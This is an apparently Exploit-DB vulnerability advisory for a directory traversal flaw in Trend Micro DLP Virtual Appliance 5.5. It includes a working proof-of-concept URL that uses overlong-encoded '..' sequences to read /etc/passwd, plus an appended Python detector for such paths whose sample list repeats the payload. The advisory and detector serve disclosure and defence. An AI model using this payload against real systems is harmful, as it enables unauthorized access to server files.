Trend Micro Data Loss Prevention Virtual Appliance 5.5 - Directory Traversal

EDB-ID: 17388
CVE:
Platform: Windows
Date: 2011-06-11



Software: Trend Micro Data Loss Prevention Virtual Appliance 5.5
Vulnerability: Directory Traversal
Threat Level: Serious (5/5)
Download: http://support.trendmicro.com.cn/TM-Product/Product/DLP/5.5/Manager/5.5_GM/DLPVA-5.5.1294-i386-DVD.iso
Discovery Date: 27/05/2011
Remote: Yes

Author: Luis Martinez, Sergio Lopez, White Hat Consultores
Site: http://whitehatconsultores.com/
Email: Sergio López <sergio.sh at gmail.com>, Luis Martínez <luismtzsilva at gmail.com>

Description:
A directory traversal vulnerability can be exploited to read files outside of the web root.

PoC Exploit:
https://IP:8443/dsc//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

PDF Advisory: 
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17388.pdf
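
Detection note (added example, not part of the original advisory): the PoC path encodes each "." as %c0%ae, an overlong two-byte UTF-8 form, so filters that only look for a literal `..` or `%2e%2e` do not match it. The Python check below flags request paths carrying such overlong forms; the names `decode_lenient` and `classify` and the sample paths are constructed for illustration, and it generalizes to any 0xC0/0xC1 lead byte.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample request paths (not taken from a real log).
SAMPLE_PATHS = [
    "/dsc/login.jsp",
    "/dsc//%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",  # overlong-encoded ".."
    "/dsc/%2e%2e/%2e%2e/etc/passwd",                # plain percent-encoded ".."
    "/dsc/caf%c3%a9.html",                          # valid UTF-8, no traversal
]

def decode_lenient(raw: bytes) -> tuple:
    """Decode bytes the way a lenient UTF-8 decoder would.

    Lead bytes 0xC0/0xC1 can only produce code points below U+0080,
    which strict UTF-8 forbids; report whether any were seen.
    Returns (decoded_text, overlong_seen).
    """
    out, overlong, i = [], False, 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            overlong = True
            i += 2
        else:
            out.append(chr(b))  # byte passthrough is enough to match "." and "/"
            i += 1
    return "".join(out), overlong

def classify(path: str) -> str:
    """Label a request path: ok, traversal, overlong-encoding, overlong-traversal."""
    decoded, overlong = decode_lenient(unquote_to_bytes(path))
    traversal = ".." in re.split(r"[/\\]+", decoded)
    if overlong and traversal:
        return "overlong-traversal"
    if overlong:
        return "overlong-encoding"
    return "traversal" if traversal else "ok"

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(f"{classify(p):20s} {p}")
```

Any `overlong-encoding` hit is worth alerting on by itself, since legitimate clients do not emit 0xC0/0xC1 lead bytes.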